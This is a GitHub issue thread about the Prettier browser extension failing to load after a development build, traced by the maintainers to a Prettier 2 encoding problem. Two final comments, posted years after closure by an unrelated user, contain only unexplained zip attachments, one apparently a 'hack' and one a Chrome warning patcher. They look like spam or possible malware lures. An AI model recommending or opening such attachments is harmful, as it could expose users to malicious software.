### ISSUE TITLE
Unable to load unpacked extension after development build

### ISSUE THREAD

**Issue by chrissantamaria** [prettier/prettier-browser-extension#203] opened 2020-04-19 00:05 UTC
## Issue

Attempting to load the latest version of the extension after a development build (`yarn start`) gives the following error:

![](https://i.imgur.com/F7fErGP.png)

However, loading the extension folder after a production `yarn build` (ignoring the final compressed zip) works as expected.

I ran a quick `git bisect` and found that 7cbbc20 was the first commit to introduce this. I'm still trying to narrow down exactly what is causing this - seems like a fairly innocent commit as far as webpack goes. Even reverting the changes to `webpack.config.js` still causes the issue. @nickmccurdy, any thoughts?

## Steps to reproduce

1. Clone the repo
2. `yarn`
3. `yarn start`
4. [Load the unpacked extension in Chrome](https://github.com/prettier/prettier-chrome-extension#test-in-chrome-locally)

## Environment

- macOS Catalina 10.15.3
- Chrome 80.0.3987.163
- Node 12.16.2
- Yarn 1.21.1

**Comment by nickmccurdy** [comment] 2020-04-19 02:04
Sorry about that, I guess I forgot to test in development. Chrome seems to be very finnicky about the encoding of extensions, and we've had various issues like this. I'm guessing that Prettier 2 introduced some encoding issues that were only fixed in production, not development. I can confirm that `yarn build` works for me but `yarn start` does not.

**Comment by sibiraj-s** [comment] 2020-06-09 14:13
@nickmccurdy I have raised a PR to prettier https://github.com/prettier/prettier/pull/8534, that should fix this issue.

**Comment by nickmccurdy** [comment] 2020-06-20 18:59
Thank you. Can't wait until this is released, the production builds are pretty slow.

**Closed** 2020-09-02 22:59 UTC
Labels: internal

**Comment by hakiimxpert400** [comment] 2024-08-28 08:35
[stuhack-main.zip](https://github.com/user-attachments/files/16780584/stuhack-main.zip)

**Comment by hakiimxpert400** [comment] 2024-08-28 08:35
[Chrome-Developer-Mode-Extension-Warning-Patcher-master.zip](https://github.com/user-attachments/files/16780594/Chrome-Developer-Mode-Extension-Warning-Patcher-master.zip)
